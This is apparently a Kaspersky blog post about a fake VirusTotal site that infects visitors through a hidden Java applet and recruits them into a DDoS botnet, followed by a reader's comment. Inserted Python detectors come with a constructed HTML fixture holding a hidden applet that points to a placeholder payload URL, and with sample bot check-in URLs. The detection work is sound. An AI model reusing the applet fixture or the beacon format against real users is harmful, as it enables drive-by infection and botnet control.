
Fake VirusTotal website propagates Java worm

Jorge Mieres
Kaspersky Lab Expert
Posted May 24, 00:48  GMT
Tags: Botnets, DDoS, JavaScript

Infection strategies that rely on Java technology are very much in vogue, and the reason is Java's "hybrid" status: it lets criminals broaden their attack coverage, recruiting infected computers regardless of the browser or operating system the victim uses.

On the criminal side, drive-by download techniques that inject malicious scripts into various websites are combined with social engineering, which obliges users to sharpen their sense of "detection" more and more.

Over the weekend we came across a fake copy of VirusTotal, Hispasec's popular suspicious-file analysis service, set up to infect users through the methods mentioned above.

To a user, the site looks exactly like the original. Hidden in its source, however, are the parameters needed to infect the system through a Java applet, which silently downloads malware detected by Kaspersky Lab as Worm.MSIL.Arcdoor.ov.
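The hidden applet described above is the kind of thing a defender can look for in a suspected lookalike page. The following is an added example, not code from the Kaspersky post: it walks a page's HTML and reports Java launchers, that is, <applet> elements and <object> elements whose type or classid points at the Java Plug-in, together with the parameters they pass and whether they are sized to be invisible. The sample HTML, the .jar name and the hostnames in it are constructed placeholders.

```python
"""Find Java applet launchers hidden in a web page's HTML.

Added example, not code from the Kaspersky post. SAMPLE_HTML is constructed;
the archive name and hostname in it are placeholders.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional

# Constructed lookalike page: a visible upload form plus a hidden Java applet
# and a second, zero-sized Java <object> launcher.
SAMPLE_HTML = """
<html><body>
<h1>Upload a file for analysis</h1>
<form action="/upload" method="post"><input type="file" name="f"></form>
<div style="display:none">
<applet code="Loader.class" archive="update.jar" width="1" height="1">
  <param name="url" value="http://payload-placeholder.example/x.exe">
</applet>
</div>
<object type="application/x-java-applet" width="0" height="0">
  <param name="jnlp_href" value="launch.jnlp">
</object>
</body></html>
"""

# Well-known Java Plug-in ActiveX classid and applet MIME type.
JAVA_CLASSID = "clsid:8ad9c840-044e-11d1-b3e9-00805f499d93"
JAVA_MIME = "application/x-java-applet"


def _is_tiny(attrs: Dict[str, Optional[str]]) -> bool:
    """True when width or height is 0/1 pixel, i.e. the element is meant to be unseen."""
    for key in ("width", "height"):
        value = (attrs.get(key) or "").strip()
        if value in ("0", "1"):
            return True
    return False


class AppletFinder(HTMLParser):
    """Collect <applet> and Java-typed <object> elements with their <param> children."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict] = []
        self._current: Optional[Dict] = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        mime = (a.get("type") or "").lower()
        classid = (a.get("classid") or "").lower()
        if tag == "applet" or (tag == "object" and (mime == JAVA_MIME or classid == JAVA_CLASSID)):
            self._current = {
                "tag": tag,
                "code": a.get("code"),
                "archive": a.get("archive"),
                "hidden": _is_tiny(a),
                "params": {},
            }
        elif tag == "param" and self._current is not None:
            # <param> is a void element; HTMLParser only reports its start tag.
            self._current["params"][a.get("name")] = a.get("value")

    def handle_endtag(self, tag):
        if tag in ("applet", "object") and self._current is not None:
            self.findings.append(self._current)
            self._current = None


def find_java_launchers(html: str) -> List[Dict]:
    """Return one record per Java launcher found in the page."""
    parser = AppletFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for f in find_java_launchers(SAMPLE_HTML):
        print(f"<{f['tag']}> code={f['code']} archive={f['archive']} hidden={f['hidden']} params={f['params']}")
```

On the constructed page both launchers are reported as hidden; on a real site analysis page (which has no reason to load Java at all) any hit is worth a closer look.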

The worm is designed to recruit zombies for a botnet built primarily to carry out DDoS attacks: synflood, httpflood, udpflood and icmpflood. Communication centres on a C&C server that stores the information obtained from the victim machine. Some of the parameters involved in that communication are:

&mode: type of DDoS attack
&botver: malware version
&pcname: victim machine name (hostname)
&winver: operating system type and version
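Because the check-in travels as ordinary query-string parameters, the parameter names above make a workable detection signature on proxy or web-server logs. The following is an added example, not code from the Kaspersky post: it parses log lines in a simple "client method url status" layout and flags requests whose query string carries at least three of the four parameters, so that a lone "mode=" or "pcname=" on a legitimate site does not fire the rule. The log lines, client addresses and hostnames are constructed placeholders.

```python
"""Flag HTTP requests whose query string looks like an Arcdoor-style bot check-in.

Added example, not code from the Kaspersky post. SAMPLE_LOG is constructed;
the client addresses and hostnames in it are placeholders.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Check-in parameter names named in the post. Requiring several of them
# together keeps a generic "mode=" or "pcname=" query from matching on its own.
BEACON_PARAMS = {"mode", "botver", "pcname", "winver"}
MIN_MATCHES = 3

# Constructed proxy log lines: "<client> <method> <url> <status>".
SAMPLE_LOG = """\
10.0.0.12 GET http://cnc-placeholder.example/gate.php?mode=synflood&botver=1.2&pcname=DESKTOP-01&winver=WinXP 200
10.0.0.12 GET http://www.example.com/search?mode=list&page=2 200
10.0.0.15 GET http://cnc-placeholder.example/gate.php?botver=1.2&pcname=LAB-PC&winver=Win7 200
10.0.0.20 GET http://cdn.example.net/assets/app.js 200
"""

LOG_RE = re.compile(r"^(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")


def classify_url(url: str) -> Optional[Dict[str, str]]:
    """Return the matched check-in parameters for a URL, or None if it is not a check-in."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits = BEACON_PARAMS & set(params)
    if len(hits) < MIN_MATCHES:
        return None
    return {name: params[name][0] for name in sorted(hits)}


def scan_log(text: str) -> List[Dict]:
    """Parse each log line and collect the requests that look like bot check-ins."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than failing the whole scan
        matched = classify_url(m["url"])
        if matched is None:
            continue
        findings.append({
            "client": m["client"],
            "host": urlsplit(m["url"]).hostname,
            "params": matched,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} -> {f['host']}: {f['params']}")
```

The threshold is the knob to tune: three of four parameters catches a check-in that omits &mode between attacks, while the search-page request with a single "mode=" parameter is left alone. In production the hostname of every hit is the value to pivot on, since the C&C host is shared by all infected clients.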

These attacks are usually run from a centralized hub from which the attacker manages the malicious manoeuvres using DDoS framework web applications such as N0ise (used in this case), Cythosia or NOPE. Such applications see heavy use and are in high demand in terms of development, particularly from Germany within Europe.

Kaspersky Lab detects this threat proactively and is continuing its investigation into these criminal activities.



2011 Aug 15, 10:19

Kaspersky - You need help!

You don't know how funny I find this. You're representing Kaspersky and you don't even know what a Java Drive-By is? Okay, let me explain to you what a Java Drive-By is so you can re-write this article correctly. A Java Drive-By is a web application that can be used to download an executable file pretty much anywhere on the user's computer and executed once downloaded when they press "Run".

I honestly don't understand why you put "JavaScript" as one of the tags when "Javascript" is not even involved in any of this. Please learn the difference between Javascript and Java. Let me explain it better yet. Javascript is a type of website coding that is used for websites and Java is used as a program or application. Javascript doesn't even have access to the computer like Java has, because Javascript is a language that is used for websites.
